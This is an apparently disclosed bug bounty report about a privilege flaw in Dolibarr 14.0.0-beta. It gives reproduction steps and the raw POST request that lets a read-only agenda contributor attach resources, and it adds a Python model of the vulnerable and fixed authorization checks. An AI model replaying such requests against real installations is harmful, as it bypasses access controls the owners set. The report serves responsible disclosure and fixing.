Improper Privilege Management in dolibarr/dolibarr

Valid

Reported on May 23rd 2021


💥 BUG

An unprivileged user can add a resource to an agenda.

💥 IMPACT

A user with read-only permission can add a resource to an agenda.

💥 TESTED VERSION

dolibarr 14.0.0-beta

💥 STEP TO REPRODUCE

1. First, go to the admin account and add user B as a normal user.
Now give user B the permissions below for the Events/Agenda and Resources modules.

Events/Agenda-->Read actions (events or tasks) linked to his user account (if owner of event or just assigned to)
Resources-->Read resources

So user B can see agendas assigned to him as a contributor but cannot modify them.

2. Now, from the admin account, go to the Agenda module and create an agenda.
Now the admin adds user B to this agenda as a contributor.

3. Finally, go to user B's account; here user B can see the agenda but cannot edit it.
But user B can add a resource to this agenda with the request below.

POST /dolibarr-develop/htdocs/resource/element_resource.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/resource/element_resource.php?element=action&element_id=2
Cookie: DOLINSTALLNOPING_ec41f89b17787dd4c217ae49b23f4604=0; DOLSESSID_8e8881ad773ee74880c453666c22c288=os0ama6kpuv1qvtr24r0rrj13d
Upgrade-Insecure-Requests: 1

token=%242y%2410%24lrTA2V6GCCXJa5wD0RixsuZbRCcD1wVg4wdoADT6EUr1D6vRggj%2Fm&action=add_element_resource&element=action&element_id=2&ref=&resource_type=dolresource&fk_resource=1&busy=1&mandatory=0
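The request above works because the handler behind action=add_element_resource only needs the caller to be able to see the event it is attached to, not to modify it. The following is an added illustrative model of that authorization decision; it is not Dolibarr's code and does not reproduce the fix in commit 02632e. The User and Event types, the rights strings (agenda.myactions.read, agenda.myactions.create, resource.read and so on) and the handler names are hypothetical stand-ins. It parses a POST body constructed from the report's parameters (with a placeholder CSRF token), runs it through a handler that checks only read access, which lets the read-only contributor succeed, and then through a handler that gates the write action on write permission for the event.

```python
"""Authorization model for the reported agenda/resource bug (added example).

Illustrative code, not Dolibarr's own: the rights strings, the User and Event
types and the handler names are hypothetical stand-ins for the real objects.
"""
from dataclasses import dataclass, field
from urllib.parse import parse_qs


class Forbidden(Exception):
    """Raised where the real application would answer with an access-denied page."""


@dataclass
class User:
    login: str
    admin: bool = False
    rights: set = field(default_factory=set)


@dataclass
class Event:
    id: int
    owner: str
    contributors: set = field(default_factory=set)
    resources: list = field(default_factory=list)


def is_linked_to(user: User, event: Event) -> bool:
    # "owner of event or just assigned to": the condition behind the
    # "Read actions linked to his user account" permission in the report.
    return event.owner == user.login or user.login in event.contributors


def can_read_event(user: User, event: Event) -> bool:
    if user.admin or "agenda.allactions.read" in user.rights:
        return True
    return "agenda.myactions.read" in user.rights and is_linked_to(user, event)


def can_write_event(user: User, event: Event) -> bool:
    if user.admin or "agenda.allactions.create" in user.rights:
        return True
    return "agenda.myactions.create" in user.rights and is_linked_to(user, event)


def parse_form(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body to single string values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def add_element_resource_vulnerable(user: User, event: Event, resource_id: int) -> bool:
    # Only checks that the caller may *see* the event, so a read-only contributor succeeds.
    if not can_read_event(user, event):
        raise Forbidden("no read access to event %d" % event.id)
    event.resources.append(resource_id)
    return True


def add_element_resource_fixed(user: User, event: Event, resource_id: int) -> bool:
    # Attaching a resource modifies the event, so it needs write permission on the
    # event; the caller must also be allowed to see the resource being linked.
    if not can_write_event(user, event):
        raise Forbidden("no write access to event %d" % event.id)
    if not (user.admin or "resource.read" in user.rights):
        raise Forbidden("no access to resources")
    event.resources.append(resource_id)
    return True


def handle_post(user: User, body: str, events: dict, handler) -> bool:
    """Dispatch a POST body like the one in the report through the chosen handler."""
    form = parse_form(body)
    if form.get("action") != "add_element_resource" or form.get("element") != "action":
        return False
    event = events[int(form["element_id"])]
    return handler(user, event, int(form["fk_resource"]))


# Constructed scenario mirroring the report: admin owns event 2, user B is a contributor
# holding only the two read permissions listed in the report.
ADMIN = User("admin", admin=True)
USER_B = User("userb", rights={"agenda.myactions.read", "resource.read"})

# Body constructed from the parameters in the report; the CSRF token is a placeholder.
POST_BODY = ("token=TOKEN_PLACEHOLDER&action=add_element_resource&element=action"
             "&element_id=2&ref=&resource_type=dolresource&fk_resource=1&busy=1&mandatory=0")


def run_scenario(handler) -> str:
    """Return 'added' or 'forbidden' for user B's POST against a fresh copy of event 2."""
    events = {2: Event(id=2, owner="admin", contributors={"userb"})}
    try:
        handle_post(USER_B, POST_BODY, events, handler)
        return "added"
    except Forbidden:
        return "forbidden"


if __name__ == "__main__":
    print("vulnerable handler:", run_scenario(add_element_resource_vulnerable))  # added
    print("fixed handler:     ", run_scenario(add_element_resource_fixed))       # forbidden
```

The point the model makes is that read access to a parent object must not be the only gate on a sub-action that writes to it; each write action is checked against a write permission on the object it modifies, which is the property to verify on any handler that dispatches on an action parameter.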

Laurent Destailleur validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on 02632e a month ago
Laurent Destailleur has been awarded the fix bounty